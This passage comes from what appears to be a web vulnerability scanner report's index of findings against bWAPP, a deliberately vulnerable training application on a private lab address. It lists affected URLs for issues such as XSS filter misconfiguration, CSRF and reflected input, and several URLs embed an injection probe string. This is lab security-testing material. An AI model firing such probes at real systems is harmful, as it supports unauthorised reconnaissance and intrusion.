18.182. http://192.168.52.147/bWAPP/xss_phpmyadmin.php

18.183. http://192.168.52.147/bWAPP/xss_post.php

18.184. http://192.168.52.147/bWAPP/xss_referer.php

18.185. http://192.168.52.147/bWAPP/xss_sqlitemanager.php

18.186. http://192.168.52.147/bWAPP/xss_stored_1.php

18.187. http://192.168.52.147/bWAPP/xss_stored_2.php

18.188. http://192.168.52.147/bWAPP/xss_stored_3.php

18.189. http://192.168.52.147/bWAPP/xss_stored_4.php

18.190. http://192.168.52.147/bWAPP/xss_user_agent.php

18.191. http://192.168.52.147/bWAPP/xxe-1.php

19. J2EEScan - Apache/Jboss Status Servlet - Information Disclosure

20. Browser cross-site scripting filter misconfiguration

20.1. http://192.168.52.147/bWAPP/

20.2. http://192.168.52.147/bWAPP/666

20.3. http://192.168.52.147/bWAPP/admin/

20.4. http://192.168.52.147/bWAPP/admin/index.php

20.5. http://192.168.52.147/bWAPP/admin/phpinfo.php

20.6. http://192.168.52.147/bWAPP/admin/phpinfo.php/

20.7. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/

20.8. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/

20.9. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/

20.10. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/

20.11. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/

20.12. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/DTD/a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c

20.13. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/DTD/xhtml1-transitional.dtd

20.14. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/xhtml1-transitional.dtd

20.15. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/xhtml1-transitional.dtd

20.16. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/xhtml1-transitional.dtd

20.17. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/xhtml1-transitional.dtd

20.18. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/xhtml1-transitional.dtd

20.19. http://192.168.52.147/bWAPP/admin/phpinfo.php/a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c

20.20. http://192.168.52.147/bWAPP/aim.php

20.21. http://192.168.52.147/bWAPP/ba_captcha_bypass.php

20.22. http://192.168.52.147/bWAPP/ba_forgotten.php

20.23. http://192.168.52.147/bWAPP/ba_insecure_login.php

20.24. http://192.168.52.147/bWAPP/ba_insecure_login_2.php

20.25. http://192.168.52.147/bWAPP/ba_pwd_attacks.php

20.26. http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php

20.27. http://192.168.52.147/bWAPP/ba_weak_pwd.php

20.28. http://192.168.52.147/bWAPP/bof_1.php

20.29. http://192.168.52.147/bWAPP/bof_2.php

20.30. http://192.168.52.147/bWAPP/captcha_box.php

20.31. http://192.168.52.147/bWAPP/cgi-bin/shellshock.sh

20.32. http://192.168.52.147/bWAPP/clickjacking.php

20.33. http://192.168.52.147/bWAPP/clickjacking.php/a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c

20.34. http://192.168.52.147/bWAPP/commandi.php

20.35. http://192.168.52.147/bWAPP/commandi.php/a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c

20.36. http://192.168.52.147/bWAPP/commandi_blind.php

20.37. http://192.168.52.147/bWAPP/credits.php

20.38. http://192.168.52.147/bWAPP/csrf_2.php

20.39. http://192.168.52.147/bWAPP/csrf_3.php

20.40. http://192.168.52.147/bWAPP/directory_traversal_1.php

20.41. http://192.168.52.147/bWAPP/directory_traversal_2.php

20.42. http://192.168.52.147/bWAPP/fonts/

20.43. http://192.168.52.147/bWAPP/fonts/arial.ttf

20.44. http://192.168.52.147/bWAPP/fonts/arialbd.ttf

20.45. http://192.168.52.147/bWAPP/fonts/arialbi.ttf

20.46. http://192.168.52.147/bWAPP/fonts/ariali.ttf

20.47. http://192.168.52.147/bWAPP/fonts/ariblk.ttf

20.48. http://192.168.52.147/bWAPP/fonts/atommicclock.gdf

20.49. http://192.168.52.147/bWAPP/fonts/backlash.gdf

20.50. http://192.168.52.147/bWAPP/fonts/hootie.gdf

20.51. http://192.168.52.147/bWAPP/heartbleed.php

20.52. http://192.168.52.147/bWAPP/hostheader_1.php

20.53. http://192.168.52.147/bWAPP/hostheader_2.php

20.54. http://192.168.52.147/bWAPP/hpp-1.php

20.55. http://192.168.52.147/bWAPP/hpp-2.php

20.56. http://192.168.52.147/bWAPP/hpp-3.php

20.57. http://192.168.52.147/bWAPP/htmli_current_url.php

20.58. http://192.168.52.147/bWAPP/htmli_get.php

20.59. http://192.168.52.147/bWAPP/htmli_post.php

20.60. http://192.168.52.147/bWAPP/htmli_stored.php

20.61. http://192.168.52.147/bWAPP/http_response_splitting.php

20.62. http://192.168.52.147/bWAPP/http_verb_tampering.php

20.63. http://192.168.52.147/bWAPP/iframei.php

20.64. http://192.168.52.147/bWAPP/images/

20.65. http://192.168.52.147/bWAPP/images/file.txt

20.66. http://192.168.52.147/bWAPP/images/spider.swf

20.67. http://192.168.52.147/bWAPP/info.php

20.68. http://192.168.52.147/bWAPP/information_disclosure_1.php

20.69. http://192.168.52.147/bWAPP/information_disclosure_2.php

20.70. http://192.168.52.147/bWAPP/information_disclosure_3.php

20.71. http://192.168.52.147/bWAPP/information_disclosure_4.php

20.72. http://192.168.52.147/bWAPP/insecure_crypt_storage_1.php

20.73. http://192.168.52.147/bWAPP/insecure_crypt_storage_2.php

20.74. http://192.168.52.147/bWAPP/insecure_crypt_storage_3.php

20.75. http://192.168.52.147/bWAPP/insecure_direct_object_ref_1.php

20.76. http://192.168.52.147/bWAPP/insecure_direct_object_ref_2.php

20.77. http://192.168.52.147/bWAPP/insecure_direct_object_ref_3.php

20.78. http://192.168.52.147/bWAPP/insecure_iframe.php

20.79. http://192.168.52.147/bWAPP/insuff_transp_layer_protect_1.php

20.80. http://192.168.52.147/bWAPP/insuff_transp_layer_protect_2.php

20.81. http://192.168.52.147/bWAPP/insuff_transp_layer_protect_3.php

20.82. http://192.168.52.147/bWAPP/insuff_transp_layer_protect_4.php

20.83. http://192.168.52.147/bWAPP/js/

20.84. http://192.168.52.147/bWAPP/js/html5.js

20.85. http://192.168.52.147/bWAPP/js/jquery-1.4.4.min.js

20.86. http://192.168.52.147/bWAPP/js/json2.js

20.87. http://192.168.52.147/bWAPP/js/xss_ajax_1.js

20.88. http://192.168.52.147/bWAPP/ldap_connect.php

20.89. http://192.168.52.147/bWAPP/ldapi.php

20.90. http://192.168.52.147/bWAPP/lfi_sqlitemanager.php

20.91. http://192.168.52.147/bWAPP/login.php

20.92. http://192.168.52.147/bWAPP/logout.php

20.93. http://192.168.52.147/bWAPP/logs/

20.94. http://192.168.52.147/bWAPP/logs/visitors.txt

20.95. http://192.168.52.147/bWAPP/maili.php

20.96. http://192.168.52.147/bWAPP/manual_interv.php

20.97. http://192.168.52.147/bWAPP/password_change.php

20.98. http://192.168.52.147/bWAPP/passwords/

20.99. http://192.168.52.147/bWAPP/passwords/accounts.txt

20.100. http://192.168.52.147/bWAPP/passwords/heroes.xml

20.101. http://192.168.52.147/bWAPP/passwords/web.config.bak

20.102. http://192.168.52.147/bWAPP/passwords/wp-config.bak

20.103. http://192.168.52.147/bWAPP/php_cgi.php

20.104. http://192.168.52.147/bWAPP/php_eval.php

20.105. http://192.168.52.147/bWAPP/phpi.php

20.106. http://192.168.52.147/bWAPP/phpi_sqlitemanager.php

20.107. http://192.168.52.147/bWAPP/portal.php

20.108. http://192.168.52.147/bWAPP/reset.php

20.109. http://192.168.52.147/bWAPP/restrict_device_access.php

20.110. http://192.168.52.147/bWAPP/restrict_folder_access.php

20.111. http://192.168.52.147/bWAPP/rlfi.php

20.112. http://192.168.52.147/bWAPP/robots.txt

20.113. http://192.168.52.147/bWAPP/secret-cors-2.php

20.114. http://192.168.52.147/bWAPP/secret.php

20.115. http://192.168.52.147/bWAPP/secret_html.php

20.116. http://192.168.52.147/bWAPP/security_level_set.php

20.117. http://192.168.52.147/bWAPP/shellshock.php

20.118. http://192.168.52.147/bWAPP/sm_cors.php

20.119. http://192.168.52.147/bWAPP/sm_cross_domain_policy.php

20.120. http://192.168.52.147/bWAPP/sm_dos_1.php

20.121. http://192.168.52.147/bWAPP/sm_dos_3.php

20.122. http://192.168.52.147/bWAPP/sm_dos_4.php

20.123. http://192.168.52.147/bWAPP/sm_ftp.php

20.124. http://192.168.52.147/bWAPP/sm_local_priv_esc_1.php

20.125. http://192.168.52.147/bWAPP/sm_local_priv_esc_2.php

20.126. http://192.168.52.147/bWAPP/sm_mitm_1.php

20.127. http://192.168.52.147/bWAPP/sm_mitm_2.php

20.128. http://192.168.52.147/bWAPP/sm_robots.php

20.129. http://192.168.52.147/bWAPP/sm_samba.php

20.130. http://192.168.52.147/bWAPP/sm_snmp.php

20.131. http://192.168.52.147/bWAPP/sm_webdav.php

20.132. http://192.168.52.147/bWAPP/sm_xst.php

20.133. http://192.168.52.147/bWAPP/smgmt_admin_portal.php

20.134. http://192.168.52.147/bWAPP/smgmt_cookies_httponly.php

20.135. http://192.168.52.147/bWAPP/smgmt_cookies_secure.php

20.136. http://192.168.52.147/bWAPP/smgmt_sessionid_url.php

20.137. http://192.168.52.147/bWAPP/smgmt_strong_sessions.php

20.138. http://192.168.52.147/bWAPP/sqli_1.php

20.139. http://192.168.52.147/bWAPP/sqli_10-1.php

20.140. http://192.168.52.147/bWAPP/sqli_11.php

20.141. http://192.168.52.147/bWAPP/sqli_12.php

20.142. http://192.168.52.147/bWAPP/sqli_13.php

20.143. http://192.168.52.147/bWAPP/sqli_14.php

20.144. http://192.168.52.147/bWAPP/sqli_15.php

20.145. http://192.168.52.147/bWAPP/sqli_16.php

20.146. http://192.168.52.147/bWAPP/sqli_17.php

20.147. http://192.168.52.147/bWAPP/sqli_2.php

20.148. http://192.168.52.147/bWAPP/sqli_3.php

20.149. http://192.168.52.147/bWAPP/sqli_4.php

20.150. http://192.168.52.147/bWAPP/sqli_5.php

20.151. http://192.168.52.147/bWAPP/sqli_6.php

20.152. http://192.168.52.147/bWAPP/sqli_7.php

20.153. http://192.168.52.147/bWAPP/sqli_8-1.php

20.154. http://192.168.52.147/bWAPP/sqli_9.php

20.155. http://192.168.52.147/bWAPP/sqli_drupal.php

20.156. http://192.168.52.147/bWAPP/ssii.php

20.157. http://192.168.52.147/bWAPP/ssii.shtml

20.158. http://192.168.52.147/bWAPP/ssrf.php

20.159. http://192.168.52.147/bWAPP/stylesheets/

20.160. http://192.168.52.147/bWAPP/top_security.php

20.161. http://192.168.52.147/bWAPP/training.php

20.162. http://192.168.52.147/bWAPP/unrestricted_file_upload.php

20.163. http://192.168.52.147/bWAPP/unvalidated_redir_fwd_1.php

20.164. http://192.168.52.147/bWAPP/unvalidated_redir_fwd_2.php

20.165. http://192.168.52.147/bWAPP/user_extra.php

20.166. http://192.168.52.147/bWAPP/user_new.php

20.167. http://192.168.52.147/bWAPP/ws_soap.php

20.168. http://192.168.52.147/bWAPP/xmli_1.php

20.169. http://192.168.52.147/bWAPP/xmli_2.php

20.170. http://192.168.52.147/bWAPP/xss_ajax_1-1.php

20.171. http://192.168.52.147/bWAPP/xss_ajax_2-1.php

20.172. http://192.168.52.147/bWAPP/xss_back_button.php

20.173. http://192.168.52.147/bWAPP/xss_custom_header.php

20.174. http://192.168.52.147/bWAPP/xss_eval.php

20.175. http://192.168.52.147/bWAPP/xss_get.php

20.176. http://192.168.52.147/bWAPP/xss_href-1.php

20.177. http://192.168.52.147/bWAPP/xss_href-2.php

20.178. http://192.168.52.147/bWAPP/xss_href-3.php

20.179. http://192.168.52.147/bWAPP/xss_json.php

20.180. http://192.168.52.147/bWAPP/xss_login.php

20.181. http://192.168.52.147/bWAPP/xss_php_self.php

20.182. http://192.168.52.147/bWAPP/xss_phpmyadmin.php

20.183. http://192.168.52.147/bWAPP/xss_post.php

20.184. http://192.168.52.147/bWAPP/xss_referer.php

20.185. http://192.168.52.147/bWAPP/xss_sqlitemanager.php

20.186. http://192.168.52.147/bWAPP/xss_stored_1.php

20.187. http://192.168.52.147/bWAPP/xss_stored_2.php

20.188. http://192.168.52.147/bWAPP/xss_stored_3.php

20.189. http://192.168.52.147/bWAPP/xss_stored_4.php

20.190. http://192.168.52.147/bWAPP/xss_user_agent.php

20.191. http://192.168.52.147/bWAPP/xxe-1.php

21. Arbitrary host header accepted

21.1. http://192.168.52.147/bWAPP/aim.php [PHPSESSID cookie]

21.2. http://192.168.52.147/bWAPP/fonts/ [security_level cookie]

21.3. http://192.168.52.147/bWAPP/logs/ [PHPSESSID cookie]

21.4. http://192.168.52.147/bWAPP/passwords/ [PHPSESSID cookie]

21.5. http://192.168.52.147/bWAPP/passwords/accounts.txt [PHPSESSID cookie]

21.6. http://192.168.52.147/bWAPP/ws_soap.php [PHPSESSID cookie]

22. Path-relative style sheet import

22.1. http://192.168.52.147/bWAPP/admin/

22.2. http://192.168.52.147/bWAPP/admin/index.php

22.3. http://192.168.52.147/bWAPP/ba_captcha_bypass.php

22.4. http://192.168.52.147/bWAPP/ba_forgotten.php

22.5. http://192.168.52.147/bWAPP/ba_insecure_login_2.php

22.6. http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php

22.7. http://192.168.52.147/bWAPP/ba_weak_pwd.php

22.8. http://192.168.52.147/bWAPP/bof_1.php

22.9. http://192.168.52.147/bWAPP/bof_2.php

22.10. http://192.168.52.147/bWAPP/cgi-bin/shellshock.sh

22.11. http://192.168.52.147/bWAPP/clickjacking.php

22.12. http://192.168.52.147/bWAPP/commandi.php

22.13. http://192.168.52.147/bWAPP/commandi_blind.php

22.14. http://192.168.52.147/bWAPP/csrf_2.php

22.15. http://192.168.52.147/bWAPP/csrf_3.php

22.16. http://192.168.52.147/bWAPP/directory_traversal_1.php

22.17. http://192.168.52.147/bWAPP/directory_traversal_2.php

22.18. http://192.168.52.147/bWAPP/heartbleed.php

22.19. http://192.168.52.147/bWAPP/hostheader_1.php

22.20. http://192.168.52.147/bWAPP/hostheader_2.php

22.21. http://192.168.52.147/bWAPP/hpp-1.php

22.22. http://192.168.52.147/bWAPP/hpp-2.php

22.23. http://192.168.52.147/bWAPP/hpp-3.php

22.24. http://192.168.52.147/bWAPP/htmli_current_url.php

22.25. http://192.168.52.147/bWAPP/htmli_get.php

22.26. http://192.168.52.147/bWAPP/htmli_post.php

22.27. http://192.168.52.147/bWAPP/htmli_stored.php

22.28. http://192.168.52.147/bWAPP/http_response_splitting.php

22.29. http://192.168.52.147/bWAPP/http_verb_tampering.php

22.30. http://192.168.52.147/bWAPP/iframei.php

22.31. http://192.168.52.147/bWAPP/info.php

22.32. http://192.168.52.147/bWAPP/information_disclosure_1.php

22.33. http://192.168.52.147/bWAPP/information_disclosure_2.php

22.34. http://192.168.52.147/bWAPP/information_disclosure_3.php

22.35. http://192.168.52.147/bWAPP/information_disclosure_4.php

22.36. http://192.168.52.147/bWAPP/insecure_crypt_storage_1.php

22.37. http://192.168.52.147/bWAPP/insecure_crypt_storage_2.php

22.38. http://192.168.52.147/bWAPP/insecure_crypt_storage_3.php

22.39. http://192.168.52.147/bWAPP/insecure_direct_object_ref_1.php

22.40. http://192.168.52.147/bWAPP/insecure_direct_object_ref_2.php

22.41. http://192.168.52.147/bWAPP/insecure_direct_object_ref_3.php

22.42. http://192.168.52.147/bWAPP/insecure_iframe.php

22.43. http://192.168.52.147/bWAPP/insuff_transp_layer_protect_1.php

22.44. http://192.168.52.147/bWAPP/insuff_transp_layer_protect_2.php

22.45. http://192.168.52.147/bWAPP/insuff_transp_layer_protect_3.php

22.46. http://192.168.52.147/bWAPP/insuff_transp_layer_protect_4.php

22.47. http://192.168.52.147/bWAPP/ldap_connect.php

22.48. http://192.168.52.147/bWAPP/lfi_sqlitemanager.php

22.49. http://192.168.52.147/bWAPP/login.php

22.50. http://192.168.52.147/bWAPP/maili.php

22.51. http://192.168.52.147/bWAPP/manual_interv.php

22.52. http://192.168.52.147/bWAPP/password_change.php

22.53. http://192.168.52.147/bWAPP/php_cgi.php

22.54. http://192.168.52.147/bWAPP/php_eval.php

22.55. http://192.168.52.147/bWAPP/phpi.php

22.56. http://192.168.52.147/bWAPP/phpi_sqlitemanager.php

22.57. http://192.168.52.147/bWAPP/portal.php

22.58. http://192.168.52.147/bWAPP/restrict_device_access.php

22.59. http://192.168.52.147/bWAPP/restrict_folder_access.php

22.60. http://192.168.52.147/bWAPP/rlfi.php

22.61. http://192.168.52.147/bWAPP/secret_html.php

22.62. http://192.168.52.147/bWAPP/security_level_set.php

22.63. http://192.168.52.147/bWAPP/shellshock.php

22.64. http://192.168.52.147/bWAPP/sm_cors.php

22.65. http://192.168.52.147/bWAPP/sm_cross_domain_policy.php

22.66. http://192.168.52.147/bWAPP/sm_dos_1.php

22.67. http://192.168.52.147/bWAPP/sm_dos_3.php

22.68. http://192.168.52.147/bWAPP/sm_dos_4.php

22.69. http://192.168.52.147/bWAPP/sm_ftp.php

22.70. http://192.168.52.147/bWAPP/sm_local_priv_esc_1.php

22.71. http://192.168.52.147/bWAPP/sm_local_priv_esc_2.php

22.72. http://192.168.52.147/bWAPP/sm_mitm_1.php

22.73. http://192.168.52.147/bWAPP/sm_mitm_2.php

22.74. http://192.168.52.147/bWAPP/sm_robots.php

22.75. http://192.168.52.147/bWAPP/sm_samba.php

22.76. http://192.168.52.147/bWAPP/sm_snmp.php

22.77. http://192.168.52.147/bWAPP/sm_webdav.php

22.78. http://192.168.52.147/bWAPP/sm_xst.php

22.79. http://192.168.52.147/bWAPP/smgmt_admin_portal.php

22.80. http://192.168.52.147/bWAPP/smgmt_cookies_httponly.php

22.81. http://192.168.52.147/bWAPP/smgmt_cookies_secure.php

22.82. http://192.168.52.147/bWAPP/smgmt_sessionid_url.php

22.83. http://192.168.52.147/bWAPP/smgmt_strong_sessions.php

22.84. http://192.168.52.147/bWAPP/sqli_1.php

22.85. http://192.168.52.147/bWAPP/sqli_10-1.php

22.86. http://192.168.52.147/bWAPP/sqli_11.php

22.87. http://192.168.52.147/bWAPP/sqli_12.php

22.88. http://192.168.52.147/bWAPP/sqli_13.php

22.89. http://192.168.52.147/bWAPP/sqli_14.php

22.90. http://192.168.52.147/bWAPP/sqli_15.php

22.91. http://192.168.52.147/bWAPP/sqli_16.php

22.92. http://192.168.52.147/bWAPP/sqli_17.php

22.93. http://192.168.52.147/bWAPP/sqli_2.php

22.94. http://192.168.52.147/bWAPP/sqli_3.php

22.95. http://192.168.52.147/bWAPP/sqli_4.php

22.96. http://192.168.52.147/bWAPP/sqli_5.php

22.97. http://192.168.52.147/bWAPP/sqli_6.php

22.98. http://192.168.52.147/bWAPP/sqli_7.php

22.99. http://192.168.52.147/bWAPP/sqli_8-1.php

22.100. http://192.168.52.147/bWAPP/sqli_9.php

22.101. http://192.168.52.147/bWAPP/sqli_drupal.php

22.102. http://192.168.52.147/bWAPP/ssii.php

22.103. http://192.168.52.147/bWAPP/ssrf.php

22.104. http://192.168.52.147/bWAPP/top_security.php

22.105. http://192.168.52.147/bWAPP/training.php

22.106. http://192.168.52.147/bWAPP/unrestricted_file_upload.php

22.107. http://192.168.52.147/bWAPP/unvalidated_redir_fwd_1.php

22.108. http://192.168.52.147/bWAPP/unvalidated_redir_fwd_2.php

22.109. http://192.168.52.147/bWAPP/user_extra.php

22.110. http://192.168.52.147/bWAPP/user_new.php

22.111. http://192.168.52.147/bWAPP/xmli_1.php

22.112. http://192.168.52.147/bWAPP/xmli_2.php

22.113. http://192.168.52.147/bWAPP/xss_ajax_1-1.php

22.114. http://192.168.52.147/bWAPP/xss_ajax_2-1.php

22.115. http://192.168.52.147/bWAPP/xss_back_button.php

22.116. http://192.168.52.147/bWAPP/xss_custom_header.php

22.117. http://192.168.52.147/bWAPP/xss_eval.php

22.118. http://192.168.52.147/bWAPP/xss_get.php

22.119. http://192.168.52.147/bWAPP/xss_href-1.php

22.120. http://192.168.52.147/bWAPP/xss_href-2.php

22.121. http://192.168.52.147/bWAPP/xss_href-3.php

22.122. http://192.168.52.147/bWAPP/xss_json.php

22.123. http://192.168.52.147/bWAPP/xss_login.php

22.124. http://192.168.52.147/bWAPP/xss_php_self.php

22.125. http://192.168.52.147/bWAPP/xss_phpmyadmin.php

22.126. http://192.168.52.147/bWAPP/xss_post.php

22.127. http://192.168.52.147/bWAPP/xss_referer.php

22.128. http://192.168.52.147/bWAPP/xss_sqlitemanager.php

22.129. http://192.168.52.147/bWAPP/xss_stored_1.php

22.130. http://192.168.52.147/bWAPP/xss_stored_2.php

22.131. http://192.168.52.147/bWAPP/xss_stored_3.php

22.132. http://192.168.52.147/bWAPP/xss_stored_4.php

22.133. http://192.168.52.147/bWAPP/xss_user_agent.php

22.134. http://192.168.52.147/bWAPP/xxe-1.php

23. Cross-site request forgery

23.1. http://192.168.52.147/bWAPP/ba_captcha_bypass.php

23.2. http://192.168.52.147/bWAPP/ba_forgotten.php

23.3. http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php

23.4. http://192.168.52.147/bWAPP/ba_weak_pwd.php

23.5. http://192.168.52.147/bWAPP/bof_1.php

23.6. http://192.168.52.147/bWAPP/user_new.php

24. Referer-dependent response

24.1. http://192.168.52.147/bWAPP/admin/phpinfo.php

24.2. http://192.168.52.147/bWAPP/admin/phpinfo.php/

24.3. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/

24.4. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/

24.5. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/

24.6. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/

24.7. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/

24.8. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/DTD/xhtml1-transitional.dtd

24.9. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/xhtml1-transitional.dtd

24.10. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/xhtml1-transitional.dtd

24.11. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/xhtml1-transitional.dtd

24.12. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/xhtml1-transitional.dtd

24.13. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/xhtml1-transitional.dtd

24.14. http://192.168.52.147/bWAPP/admin/phpinfo.php/a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c

25. Spoofable client IP address

25.1. http://192.168.52.147/bWAPP/admin/phpinfo.php

25.2. http://192.168.52.147/bWAPP/admin/phpinfo.php/

25.3. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/

25.4. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/

25.5. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/

25.6. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/

25.7. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/

25.8. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/DTD/xhtml1-transitional.dtd

25.9. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/xhtml1-transitional.dtd

25.10. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/xhtml1-transitional.dtd

25.11. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/xhtml1-transitional.dtd

25.12. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/xhtml1-transitional.dtd

25.13. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/xhtml1-transitional.dtd

25.14. http://192.168.52.147/bWAPP/admin/phpinfo.php/a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c

26. User agent-dependent response

26.1. http://192.168.52.147/bWAPP/admin/phpinfo.php

26.2. http://192.168.52.147/bWAPP/admin/phpinfo.php/

26.3. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/

26.4. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/

26.5. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/

26.6. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/

26.7. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/

26.8. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/DTD/xhtml1-transitional.dtd

26.9. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/xhtml1-transitional.dtd

26.10. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/xhtml1-transitional.dtd

26.11. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/xhtml1-transitional.dtd

26.12. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/xhtml1-transitional.dtd

26.13. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/xhtml1-transitional.dtd

26.14. http://192.168.52.147/bWAPP/admin/phpinfo.php/a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c

27. Long redirection response

27.1. http://192.168.52.147/bWAPP/portal.php

27.2. http://192.168.52.147/bWAPP/unvalidated_redir_fwd_1.php

28. Input returned in response (reflected)

28.1. http://192.168.52.147/bWAPP/ [URL path folder 1]

28.2. http://192.168.52.147/bWAPP/666 [URL path filename]

28.3. http://192.168.52.147/bWAPP/admin/ [URL path folder 2]

28.4. http://192.168.52.147/bWAPP/admin/index.php [URL path filename]

28.5. http://192.168.52.147/bWAPP/admin/index.php [name of an arbitrarily supplied URL parameter]

28.6. http://192.168.52.147/bWAPP/admin/phpinfo.php [PHPSESSID cookie]

28.7. http://192.168.52.147/bWAPP/admin/phpinfo.php [Referer HTTP header]

28.8. http://192.168.52.147/bWAPP/admin/phpinfo.php [URL path filename]

28.9. http://192.168.52.147/bWAPP/admin/phpinfo.php [User-Agent HTTP header]

28.10. http://192.168.52.147/bWAPP/admin/phpinfo.php [admin cookie]

28.11. http://192.168.52.147/bWAPP/admin/phpinfo.php [name of an arbitrarily supplied URL parameter]

28.12. http://192.168.52.147/bWAPP/admin/phpinfo.php [secret cookie]

28.13. http://192.168.52.147/bWAPP/admin/phpinfo.php [security_level cookie]

28.14. http://192.168.52.147/bWAPP/admin/phpinfo.php [top_security_nossl cookie]

28.15. http://192.168.52.147/bWAPP/admin/phpinfo.php/ [PHPSESSID cookie]

28.16. http://192.168.52.147/bWAPP/admin/phpinfo.php/ [Referer HTTP header]

28.17. http://192.168.52.147/bWAPP/admin/phpinfo.php/ [URL path folder 3]

28.18. http://192.168.52.147/bWAPP/admin/phpinfo.php/ [User-Agent HTTP header]

28.19. http://192.168.52.147/bWAPP/admin/phpinfo.php/ [admin cookie]

28.20. http://192.168.52.147/bWAPP/admin/phpinfo.php/ [movie_genre cookie]

28.21. http://192.168.52.147/bWAPP/admin/phpinfo.php/ [name of an arbitrarily supplied URL parameter]

28.22. http://192.168.52.147/bWAPP/admin/phpinfo.php/ [secret cookie]

28.23. http://192.168.52.147/bWAPP/admin/phpinfo.php/ [security_level cookie]

28.24. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/ [PHPSESSID cookie]

28.25. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/ [Referer HTTP header]

28.26. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/ [URL path folder 4]

28.27. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/ [User-Agent HTTP header]

28.28. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/ [admin cookie]

28.29. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/ [movie_genre cookie]

28.30. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/ [name of an arbitrarily supplied URL parameter]

28.31. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/ [secret cookie]

28.32. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/ [security_level cookie]

28.33. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/ [PHPSESSID cookie]

28.34. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/ [Referer HTTP header]

28.35. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/ [URL path folder 5]

28.36. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/ [User-Agent HTTP header]

28.37. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/ [admin cookie]

28.38. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/ [movie_genre cookie]

